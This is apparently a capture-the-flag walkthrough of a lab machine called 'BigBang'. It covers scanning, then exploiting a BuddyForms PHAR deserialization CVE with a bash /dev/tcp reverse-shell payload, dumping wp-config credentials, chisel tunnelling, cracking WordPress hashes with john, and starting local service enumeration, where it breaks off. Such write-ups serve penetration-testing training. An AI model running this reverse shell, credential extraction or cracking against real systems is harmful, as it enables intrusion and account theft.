Information gathering
Port scanning
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 d4:15:77:1e:82:2b:2f:f1:cc:96:c6:28:c1:86:6b:3f (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBET3VRLx4oR61tt3uTowkXZzNICnY44UpSL7zW4DLrn576oycUCy2Tvbu7bRvjjkUAjg4G080jxHLRJGI4NJoWQ=
| 256 6c:42:60:7b:ba:ba:67:24:0f:0c:ac:5d:be:92:0c:66 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAILbYOg6bg7lmU60H4seqYXpE3APnWEqfJwg1ojft/DPI
80/tcp open http syn-ack ttl 62 Apache httpd 2.4.62
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: Did not follow redirect to http://blog.bigbang.htb/
|_http-server-header: Apache/2.4.62 (Debian)
OS fingerprint not ideal because: maxTimingRatio (1.826000e+00) is greater than 1.4
Aggressive OS guesses: Linux 4.15 - 5.19 (97%), Linux 2.6.32 - 3.10 (96%), Linux 5.0 - 5.14 (94%), Linux 4.15 (93%), MikroTik RouterOS 6.36 - 6.48 (Linux 3.3.5) (93%), Linux 3.2 - 4.14 (93%), Linux 5.4 - 5.10 (93%), OpenWrt 21.02 (Linux 5.4) (93%), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3) (93%), Linux 3.8 (92%)
No exact OS matches for host (test conditions non-ideal).
TCP/IP fingerprint:
SCAN(V=7.95%E=4%D=4/1%OT=22%CT=1%CU=34085%PV=Y%DS=2%DC=T%G=N%TM=67EB9888%P=x86_64-pc-linux-gnu)
SEQ(SP=106%GCD=1%ISR=10C%TI=Z%CI=Z%II=I%TS=B)
SEQ(SP=107%GCD=1%ISR=108%TI=Z%CI=Z%II=I%TS=8)
OPS(O1=M542ST11NW7%O2=M542ST11NW7%O3=M542NNT11NW7%O4=M542ST11NW7%O5=M542ST11NW7%O6=M542ST11)
WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)
ECN(R=Y%DF=Y%T=40%W=FAF0%O=M542NNSNW7%CC=Y%Q=)
T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)
T2(R=N)
T3(R=N)
T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)
T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)
T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)
T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)
U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)
IE(R=Y%DFI=N%T=40%CD=S)
Uptime guess: 231.675 days (since Mon Aug 12 11:28:51 2024)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=263 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: Host: blog.bigbang.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 53/tcp)
HOP RTT ADDRESS
1 11.47 ms 10.10.16.1
2 14.04 ms 10.10.11.52
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 03:40
Completed NSE at 03:40, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 03:40
Completed NSE at 03:40, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 03:40
Completed NSE at 03:40, 0.00s elapsed
Read data files from: /usr/share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 2054.26 seconds
Raw packets sent: 88907 (3.914MB) | Rcvd: 88770 (3.552MB)
Fingerprinting
┌──(kali㉿kali)-[~]
└─$ whatweb http://blog.bigbang.htb
http://blog.bigbang.htb [200 OK] Apache[2.4.62], Country[RESERVED][ZZ], HTML5, HTTPServer[Debian Linux][Apache/2.4.62 (Debian)], IP[10.10.11.52], JQuery[3.7.1], MetaGenerator[WordPress 6.5.4], PHP[8.3.2], PasswordField[pwd], Script[importmap,module,text/html,text/javascript], Title[BigBang], UncommonHeaders[link], WordPress[6.5.4], X-Powered-By[PHP/8.3.2]
This shows the site is built on WordPress.
Directory scanning
dirsearch
┌──(kali㉿kali)-[~]
└─$ sudo dirsearch -u blog.bigbang.htb -t 50 -x 404
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict
dirsearch v0.4.3
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 50 | Wordlist size: 11460
Output File: /home/kali/reports/_blog.bigbang.htb/_25-04-01_03-57-25.txt
Target: http://blog.bigbang.htb/
[03:57:28] Starting:
[03:58:48] 403 - 281B - /.ht_wsr.txt
[03:58:48] 403 - 281B - /.httr-oauth
[03:58:48] 403 - 281B - /.htaccess.save
[03:58:48] 403 - 281B - /.htpasswd_test
[03:58:48] 403 - 281B - /.htaccess_orig
[03:58:48] 403 - 281B - /.html
[03:58:48] 403 - 281B - /.htaccessOLD
[03:58:48] 403 - 281B - /.htaccessBAK
[03:58:48] 403 - 281B - /.htaccess.orig
[03:58:48] 403 - 281B - /.htaccess_sc
[03:58:48] 403 - 281B - /.htaccess.bak1
[03:58:48] 403 - 281B - /.htm
[03:58:48] 403 - 281B - /.htaccess_extra
[03:58:48] 403 - 281B - /.htpasswds
[03:58:48] 403 - 281B - /.htaccess.sample
[03:58:48] 403 - 281B - /.htaccessOLD2
[04:05:08] 301 - 0B - /index.php -> http://blog.bigbang.htb/
[04:05:12] 301 - 0B - /index.php/login/ -> http://blog.bigbang.htb/login/
[04:05:28] 200 - 7KB - /license.txt
[04:07:54] 200 - 3KB - /readme.html
[04:08:14] 403 - 281B - /server-status
[04:08:14] 403 - 281B - /server-status/
[04:10:43] 301 - 323B - /wp-admin -> http://blog.bigbang.htb/wp-admin/
[04:10:46] 409 - 3KB - /wp-admin/setup-config.php
[04:10:47] 302 - 0B - /wp-admin/ -> http://blog.bigbang.htb/wp-login.php?redirect_to=http%3A%2F%2Fblog.bigbang.htb%2Fwp-admin%2F&reauth=1
[04:10:47] 400 - 1B - /wp-admin/admin-ajax.php
[04:10:47] 200 - 0B - /wp-config.php
[04:10:47] 200 - 490B - /wp-admin/install.php
[04:11:00] 301 - 325B - /wp-content -> http://blog.bigbang.htb/wp-content/
[04:11:00] 403 - 281B - /wp-content/plugins/akismet/admin.php
[04:11:00] 500 - 0B - /wp-content/plugins/hello.php
[04:11:00] 200 - 0B - /wp-content/
[04:11:01] 200 - 476B - /wp-content/uploads/
[04:11:01] 200 - 415B - /wp-content/upgrade/
[04:11:01] 403 - 281B - /wp-content/plugins/akismet/akismet.php
[04:11:13] 200 - 0B - /wp-includes/rss-functions.php
[04:11:14] 302 - 0B - /wp-signup.php -> http://blog.bigbang.htb/?p=1
[04:11:14] 200 - 0B - /wp-cron.php
[04:11:14] 200 - 2KB - /wp-login.php
[04:11:19] 200 - 5KB - /wp-includes/
[04:11:25] 405 - 42B - /xmlrpc.php
Task Completed
gobuster
┌──(root㉿kali)-[/home/kali]
└─# gobuster dir -u http://blog.bigbang.htb/ -t 30 -w ./wordlists/SecLists/Discovery/Web-Content/raft-large-files-lowercase.txt --exclude-length 0
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://blog.bigbang.htb/
[+] Method: GET
[+] Threads: 30
[+] Wordlist: ./wordlists/SecLists/Discovery/Web-Content/raft-large-files-lowercase.txt
[+] Negative Status codes: 404
[+] Exclude Length: 0
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/wp-login.php (Status: 200) [Size: 5790]
/xmlrpc.php (Status: 405) [Size: 42]
/license.txt (Status: 200) [Size: 19915]
/readme.html (Status: 200) [Size: 7401]
/.htaccess (Status: 403) [Size: 281]
/wp-trackback.php (Status: 200) [Size: 135]
/wp-mail.php (Status: 403) [Size: 2501]
/wp-links-opml.php (Status: 200) [Size: 222]
/.html (Status: 403) [Size: 281]
/.htpasswd (Status: 403) [Size: 281]
/.htm (Status: 403) [Size: 281]
/.htpasswds (Status: 403) [Size: 281]
Because of network problems the scan kept throwing errors toward the end, so the rest is not copied here.
WordPress scanning
Next, scan with wpscan:
┌──(kali㉿kali)-[~]
└─$ wpscan --url http://blog.bigbang.htb/ -e ap,vt,tt,u --plugins-detection aggressive --detection-mode aggressive --force --random-user-agent --api-token xxxxxxxxxxxxxxxxxxx
WordPress Security Scanner by the WPScan Team
Version 3.8.28
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: http://blog.bigbang.htb/ [10.10.11.52]
[+] Started: Tue Apr 1 09:47:49 2025
Interesting Finding(s):
[+] XML-RPC seems to be enabled: http://blog.bigbang.htb/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://blog.bigbang.htb/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://blog.bigbang.htb/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://blog.bigbang.htb/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 6.5.4 identified (Insecure, released on 2024-06-05).
| Found By: Atom Generator (Aggressive Detection)
| - http://blog.bigbang.htb/?feed=atom, <generator uri="https://wordpress.org/" version="6.5.4">WordPress</generator>
| Confirmed By: Style Etag (Aggressive Detection)
| - http://blog.bigbang.htb/wp-admin/load-styles.php, Match: '6.5.4'
|
| [!] 3 vulnerabilities identified:
|
| [!] Title: WordPress < 6.5.5 - Contributor+ Stored XSS in HTML API
| Fixed in: 6.5.5
| References:
| - https://wpscan.com/vulnerability/2c63f136-4c1f-4093-9a8c-5e51f19eae28
| - https://wordpress.org/news/2024/06/wordpress-6-5-5/
|
| [!] Title: WordPress < 6.5.5 - Contributor+ Stored XSS in Template-Part Block
| Fixed in: 6.5.5
| References:
| - https://wpscan.com/vulnerability/7c448f6d-4531-4757-bff0-be9e3220bbbb
| - https://wordpress.org/news/2024/06/wordpress-6-5-5/
|
| [!] Title: WordPress < 6.5.5 - Contributor+ Path Traversal in Template-Part Block
| Fixed in: 6.5.5
| References:
| - https://wpscan.com/vulnerability/36232787-754a-4234-83d6-6ded5e80251c
| - https://wordpress.org/news/2024/06/wordpress-6-5-5/
[i] The main theme could not be detected.
[+] Enumerating All Plugins (via Aggressive Methods)
Checking Known Locations - Time: 01:49:30 <==============================================================================================> (109787 / 109787) 100.00% Time: 01:49:30
[+] Checking Plugin Versions (via Passive and Aggressive Methods)
[i] Plugin(s) Identified:
[+] akismet
| Location: http://blog.bigbang.htb/wp-content/plugins/akismet/
| Latest Version: 5.3.7
| Last Updated: 2025-02-14T18:49:00.000Z
|
| Found By: Known Locations (Aggressive Detection)
| - http://blog.bigbang.htb/wp-content/plugins/akismet/, status: 403
|
| [!] 1 vulnerability identified:
|
| [!] Title: Akismet 2.5.0-3.1.4 - Unauthenticated Stored Cross-Site Scripting (XSS)
| Fixed in: 3.1.5
| References:
| - https://wpscan.com/vulnerability/1a2f3094-5970-4251-9ed0-ec595a0cd26c
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-9357
| - http://blog.akismet.com/2015/10/13/akismet-3-1-5-wordpress/
| - https://blog.sucuri.net/2015/10/security-advisory-stored-xss-in-akismet-wordpress-plugin.html
|
| The version could not be determined.
[+] buddyforms
| Location: http://blog.bigbang.htb/wp-content/plugins/buddyforms/
| Last Updated: 2025-02-27T23:01:00.000Z
| Readme: http://blog.bigbang.htb/wp-content/plugins/buddyforms/readme.txt
| [!] The version is out of date, the latest version is 2.8.17
| [!] Directory listing is enabled
|
| Found By: Known Locations (Aggressive Detection)
| - http://blog.bigbang.htb/wp-content/plugins/buddyforms/, status: 200
|
| [!] 13 vulnerabilities identified:
|
| [!] Title: BuddyForms < 2.7.8 - Unauthenticated PHAR Deserialization
| Fixed in: 2.7.8
| References:
| - https://wpscan.com/vulnerability/a554091e-39d1-4e7e-bbcf-19b2a7b8e89f
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-26326
|
| [!] Title: Freemius SDK < 2.5.10 - Reflected Cross-Site Scripting
| Fixed in: 2.8.3
| References:
| - https://wpscan.com/vulnerability/7fd1ad0e-9db9-47b7-9966-d3f5a8771571
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-33999
|
| [!] Title: BuddyForms < 2.8.2 - Contributor+ Stored XSS
| Fixed in: 2.8.2
| References:
| - https://wpscan.com/vulnerability/7ebb0593-3c90-404c-9966-f87690395be9
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-25981
|
| [!] Title: Post Form – Registration Form – Profile Form for User Profiles – Frontend Content Forms for User Submissions (UGC) < 2.8.8 - Missing Authorization
| Fixed in: 2.8.8
| References:
| - https://wpscan.com/vulnerability/3eb25546-5aa3-4e58-b563-635ecdb21097
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-1158
| - https://www.wordfence.com/threat-intel/vulnerabilities/id/198cb3bb-73fe-45ae-b8e0-b7ee8dda9547
|
| [!] Title: Post Form – Registration Form – Profile Form for User Profiles – Frontend Content Forms for User Submissions (UGC) < 2.8.8 - Missing Authorization to Unauthenticated Media Deletion
| Fixed in: 2.8.8
| References:
| - https://wpscan.com/vulnerability/b6e2f281-073e-497f-898b-23d6220b20c7
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-1170
| - https://www.wordfence.com/threat-intel/vulnerabilities/id/380c646c-fd95-408a-89eb-3e646768bbc5
|
| [!] Title: Post Form – Registration Form – Profile Form for User Profiles – Frontend Content Forms for User Submissions (UGC) < 2.8.8 - Missing Authorization to Unauthenticated Media Upload
| Fixed in: 2.8.8
| References:
| - https://wpscan.com/vulnerability/71e4f4c1-20ba-42ac-8ac7-e798c4bc611d
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-1169
| - https://www.wordfence.com/threat-intel/vulnerabilities/id/6d14a90d-65ea-45da-956b-0735e2e2b538
|
| [!] Title: BuddyForms < 2.8.6 - Reflected Cross-Site Scripting via page
| Fixed in: 2.8.6
| References:
| - https://wpscan.com/vulnerability/72c096b3-55bd-4614-8029-69900db79416
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-30198
| - https://www.wordfence.com/threat-intel/vulnerabilities/id/701d6bee-6eb2-4497-bf54-fbc384d9d2e5
|
| [!] Title: BuddyForms < 2.8.9 - Unauthenticated Arbitrary File Read and Server-Side Request Forgery
| Fixed in: 2.8.9
| References:
| - https://wpscan.com/vulnerability/3f8082a0-b4b2-4068-b529-92662d9be675
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-32830
| - https://www.wordfence.com/threat-intel/vulnerabilities/id/23d762e9-d43f-4520-a6f1-c920417a2436
|
| [!] Title: BuddyForms < 2.8.10 - Email Verification Bypass due to Insufficient Randomness
| Fixed in: 2.8.10
| References:
| - https://wpscan.com/vulnerability/aa238cd4-4329-4891-b4ff-8268a5e18ae2
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-5149
| - https://www.wordfence.com/threat-intel/vulnerabilities/id/a5c8d361-698b-4abd-bcdd-0361d3fd10c5
|
| [!] Title: Post Form – Registration Form – Profile Form for User Profiles – Frontend Content Forms for User Submissions (UGC) < 2.8.12 - Authenticated (Contributor+) Privilege Escalation
| Fixed in: 2.8.12
| References:
| - https://wpscan.com/vulnerability/ca0fa099-ad8a-451f-8bb3-2c68def0ac6f
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-8246
| - https://www.wordfence.com/threat-intel/vulnerabilities/id/40760f60-b81a-447b-a2c8-83c7666ce410
|
| [!] Title: BuddyForms < 2.8.13 - Authenticated (Editor+) Stored Cross-Site Scripting
| Fixed in: 2.8.13
| References:
| - https://wpscan.com/vulnerability/61885f61-bd62-4530-abe3-56f89bcdd8e4
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-47377
| - https://www.wordfence.com/threat-intel/vulnerabilities/id/ac8a06f5-4560-401c-b762-5422b624ba84
|
| [!] Title: Frontend Content Forms for User Submissions (UGC) < 2.8.14 - Authenticated (Contributor+) Stored Cross-Site Scripting
| Fixed in: 2.8.14
| References:
| - https://wpscan.com/vulnerability/4c9e1b3a-d2ac-4864-8349-bf1ac037da14
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-12037
| - https://www.wordfence.com/threat-intel/vulnerabilities/id/accd4f34-4e10-4c83-96c3-c2a078ecd5cc
|
| [!] Title: Frontend Content Forms for User Submissions (UGC) < 2.8.16 - Authenticated (Contributor+) Stored Cross-Site Scripting via 'buddyforms_nav' Shortcode
| Fixed in: 2.8.16
| References:
| - https://wpscan.com/vulnerability/972293b8-b0a3-4c7e-8cd7-1658732b7869
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-12038
| - https://www.wordfence.com/threat-intel/vulnerabilities/id/ff0568e2-3a1e-4ed6-835a-37e3d07d7b63
|
| Version: 2.7.7 (80% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://blog.bigbang.htb/wp-content/plugins/buddyforms/readme.txt
[+] Enumerating Vulnerable Themes (via Aggressive Methods)
Checking Known Locations - Time: 00:00:25 <====================================================================================================> (652 / 652) 100.00% Time: 00:00:25
[i] No themes Found.
[+] Enumerating Timthumbs (via Aggressive Methods)
Checking Known Locations - Time: 00:01:21 <==================================================================================================> (2568 / 2568) 100.00% Time: 00:01:21
[i] No Timthumbs Found.
[+] Enumerating Users (via Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:02 <======================================================================================================> (10 / 10) 100.00% Time: 00:00:02
[i] User(s) Identified:
[+] root
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] shawking
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] WPScan DB API OK
| Plan: free
| Requests Done (during the scan): 3
| Requests Remaining: 16
[+] Finished: Tue Apr 1 11:39:31 2025
[+] Requests Done: 113077
[+] Cached Requests: 4
[+] Data Sent: 33.828 MB
[+] Data Received: 16.025 MB
[+] Memory used: 432.098 MB
[+] Elapsed time: 01:51:42
The vulnerability to focus on:
| [!] Title: BuddyForms < 2.7.8 - Unauthenticated PHAR Deserialization
| Fixed in: 2.7.8
| References:
| - https://wpscan.com/vulnerability/a554091e-39d1-4e7e-bbcf-19b2a7b8e89f
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-26326
Exploitation
Reference articles:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-26326
https://www.tenable.com/security/research/tra-2023-7
https://cve.imfht.com/detail/CVE-2023-26326
https://github.com/mesudmammad1/CVE-2023-26326_Buddyform_exploit
Run the script:
python exploit.py "http://blog.bigbang.htb/wp-admin/admin-ajax.php" 'bash -c "bash -i >& /dev/tcp/10.10.16.21/8888 0>&1"'
www-data privileges
We get a shell as www-data:
www-data@8e3a72b5e980:/var/www/html/wordpress$ ls
ls
index.php
license.txt
readme.html
wp-activate.php
wp-admin
wp-blog-header.php
wp-comments-post.php
wp-config-sample.php
wp-config.php
wp-content
wp-cron.php
wp-includes
wp-links-opml.php
wp-load.php
wp-login.php
wp-mail.php
wp-settings.php
wp-signup.php
wp-trackback.php
xmlrpc.php
www-data@8e3a72b5e980:/var/www/html/wordpress$ cat wp-config.php
cat wp-config.php
<?php
/**
* The base configuration for WordPress
*
* The wp-config.php creation script uses this file during the installation.
* You don't have to use the website, you can copy this file to "wp-config.php"
* and fill in the values.
*
* This file contains the following configurations:
*
* * Database settings
* * Secret keys
* * Database table prefix
* * ABSPATH
*
* @link https://wordpress.org/documentation/article/editing-wp-config-php/
*
* @package WordPress
*/
// ** Database settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'wordpress' );
/** Database username */
define( 'DB_USER', 'wp_user' );
/** Database password */
define( 'DB_PASSWORD', 'wp_password' );
/** Database hostname */
define( 'DB_HOST', '172.17.0.1' );
/** Database charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8mb4' );
/** The database collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );
/**#@+
* Authentication unique keys and salts.
*
* Change these to different unique phrases! You can generate these using
* the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}.
*
* You can change these at any point in time to invalidate all existing cookies.
* This will force all users to have to log in again.
*
* @since 2.6.0
*/
define( 'AUTH_KEY', '(6xl?]9=.f9(<(yxpm9]5<wKsyEc+y&MV6CjjI(0lR2)_6SWDnzO:[g98nOOPaeK' );
define( 'SECURE_AUTH_KEY', 'F<3>KtCm^zs]Mxm Rr*N:&{SWQexFn@ wnQ+bTN5UCF-<gMsT[mH$m))T>BqL}%8' );
define( 'LOGGED_IN_KEY', ':{yhPsf}tZRfMAut2$Fcne/.@Vs>uukS&JB04 Yy3{`$`6p/Q=d^9=ZpkfP,o%l]' );
define( 'NONCE_KEY', 'sC(jyKu>gY(,&: KS#Jh7x?/CB.hy8!_QcJhPGf@3q<-a,D#?!b}h8 ao;g[<OW;' );
define( 'AUTH_SALT', '_B& tL]9I?ddS! 0^_,4M)B>aHOl{}e2P(l3=!./]~v#U>dtF7zR=~LnJtLgh&KK' );
define( 'SECURE_AUTH_SALT', '<Cqw6ztRM/y?eGvMzY(~d?:#]v)em`.H!SWbk.7Fj%b@Te<r^^Vh3KQ~B2c|~VvZ' );
define( 'LOGGED_IN_SALT', '_zl+LT[GqIV{*Hpv>]H:<U5oO[w:]?%Dh(s&Tb-2k`1!WFqKu;elq7t^~v7zS{n[' );
define( 'NONCE_SALT', 't2~PvIO1qeCEa^+J}@h&x<%u~Ml{=0Orqe]l+DD7S}%KP}yi(6v$mHm4cjsK,vCZ' );
/**#@-*/
/**
* WordPress database table prefix.
*
* You can have multiple installations in one database if you give each
* a unique prefix. Only numbers, letters, and underscores please!
*/
$table_prefix = 'wp_';
/**
* For developers: WordPress debugging mode.
*
* Change this to true to enable the display of notices during development.
* It is strongly recommended that plugin and theme developers use WP_DEBUG
* in their development environments.
*
* For information on other constants that can be used for debugging,
* visit the documentation.
*
* @link https://wordpress.org/documentation/article/debugging-in-wordpress/
*/
define( 'WP_DEBUG', false );
/* Add any custom values between this line and the "stop editing" line. */
/* That's all, stop editing! Happy publishing. */
/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
define( 'ABSPATH', __DIR__ . '/' );
}
/** Sets up WordPress vars and included files. */
require_once ABSPATH . 'wp-settings.php';
www-data@8e3a72b5e980:/var/www/html/wordpress$
Internal network pivoting
Database config file → port forwarding → shawking's account
wp-config.php contains the database connection details, so we forward the traffic with chisel.
On the attacking machine (10.10.16.21), start the chisel server.
Listen on any port (for example 12345) and enable reverse mode:
./chisel server -p 12345 --reverse
On the target machine (172.17.0.1), run the chisel client.
Connect to the server on the attacking machine and set up the reverse forwarding rule:
./chisel client 10.10.16.21:12345 R:33306:172.17.0.1:3306
R:33306:172.17.0.1:3306 means traffic sent to port 33306 on the attacking machine is forwarded to 172.17.0.1:3306 on the target side.
The MySQL password is wp_password.
┌──(root㉿kali)-[/home/kali/tunnel]
└─# mysql -D 'wordpress' -u 'wp_user' -h 10.10.16.21 -P 33306 --skip-ssl -p
Enter password:
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MySQL connection id is 2260
Server version: 8.0.32 MySQL Community Server - GPL
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Support MariaDB developers by giving a star at https://github.com/MariaDB/server
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MySQL [wordpress]> show tables;
+-----------------------+
| Tables_in_wordpress |
+-----------------------+
| wp_commentmeta |
| wp_comments |
| wp_links |
| wp_options |
| wp_postmeta |
| wp_posts |
| wp_term_relationships |
| wp_term_taxonomy |
| wp_termmeta |
| wp_terms |
| wp_usermeta |
| wp_users |
+-----------------------+
12 rows in set (0.854 sec)
MySQL [wordpress]> select * from wp_users
-> ;
+----+------------+------------------------------------+---------------+----------------------+-------------------------+---------------------+---------------------+-------------+-----------------+
| ID | user_login | user_pass | user_nicename | user_email | user_url | user_registered | user_activation_key | user_status | display_name |
+----+------------+------------------------------------+---------------+----------------------+-------------------------+---------------------+---------------------+-------------+-----------------+
| 1 | root | $P$Beh5HLRUlTi1LpLEAstRyXaaBOJICj1 | root | root@bigbang.htb | http://blog.bigbang.htb | 2024-05-31 13:06:58 | | 0 | root |
| 3 | shawking | $P$Br7LUHG9NjNk6/QSYm2chNHfxWdoK./ | shawking | shawking@bigbang.htb | | 2024-06-01 10:39:55 | | 0 | Stephen Hawking |
+----+------------+------------------------------------+---------------+----------------------+-------------------------+---------------------+---------------------+-------------+-----------------+
2 rows in set (0.765 sec)
MySQL [wordpress]>
We now have shawking's WordPress password hash (phpass, MD5-based); crack it with john:
┌──(kali㉿kali)-[~]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt --format=phpass hash
Using default input encoding: UTF-8
Loaded 1 password hash (phpass [phpass ($P$ or $H$) 256/256 AVX2 8x3])
Cost 1 (iteration count) is 8192 for all loaded hashes
Will run 14 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
quantumphysics (?)
1g 0:00:00:44 DONE (2025-04-02 10:08) 0.02226g/s 99206p/s 99206c/s 99206C/s quarashi33..quag69
Use the "--show --format=phpass" options to display all of the cracked passwords reliably
Session completed.
The password is quantumphysics.
Log in as shawking:
shawking@bigbang:~$ ls
snap user.txt
shawking@bigbang:~$ cat user.txt
xxxxxxxxxxxxxxxxx
Privilege escalation
grafana.db database file → ports 9090 and 3000
With user.txt in hand, check the listening ports: 9090 and 3000 are open locally. Uploading linpeas.sh turns up the grafana.db database file.
shawking@bigbang:/tmp$ netstat -tuln
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 127.0.0.1:46773 0.0.0.0:* LISTEN
tcp 0 0 172.17.0.1:3306 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN
tcp 0 0 127.0.0.1:9090 0.0.0.0:* LISTEN
tcp 0 0 127.0.0.1:3000 0.0.0.0:* LISTEN
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN
tcp6 0 0 :::22 :::* LISTEN
tcp6 0 0 :::80 :::* LISTEN
udp 0 0 127.0.0.53:53 0.0.0.0:*
udp 0 0 0.0.0.0:68 0.0.0.0:*
╔══════════╣ Searching tables inside readable .db/.sql/.sqlite files (limit 100)
Found /opt/data/grafana.db: SQLite 3.x database, last written using SQLite version 3044000, file counter 856, database pages 245, cookie 0x1bd, schema 4, UTF-8, version-valid-for 856
Forward ports 9090 and 3000 to the local machine:
ssh -L 9090:127.0.0.1:9090 shawking@10.10.11.52
ssh -L 3000:127.0.0.1:3000 shawking@10.10.11.52
Port 9090 returns 404 when accessed directly, so brute-force its paths:
┌──(root㉿kali)-[/home/kali]
└─# dirsearch -u http://127.0.0.1:9090/ -t 50 -x 404
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict
dirsearch v0.4.3
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 50 | Wordlist size: 11460
Output File: /home/kali/reports/http_127.0.0.1_9090/__25-04-02_10-26-42.txt
Target: http://127.0.0.1:9090/
[10:26:42] Starting:
[10:28:35] 405 - 153B - /login
Task Completed
A /login path is found; the responses show it only accepts a POST with a JSON body (this probing step is important):
┌──(root㉿kali)-[/home/kali]
└─# curl http://127.0.0.1:9090/
<!doctype html>
<html lang=en>
<title>404 Not Found</title>
<h1>Not Found</h1>
<p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
┌──(root㉿kali)-[/home/kali]
└─# curl http://127.0.0.1:9090/login
<!doctype html>
<html lang=en>
<title>405 Method Not Allowed</title>
<h1>Method Not Allowed</h1>
<p>The method is not allowed for the requested URL.</p>
┌──(root㉿kali)-[/home/kali]
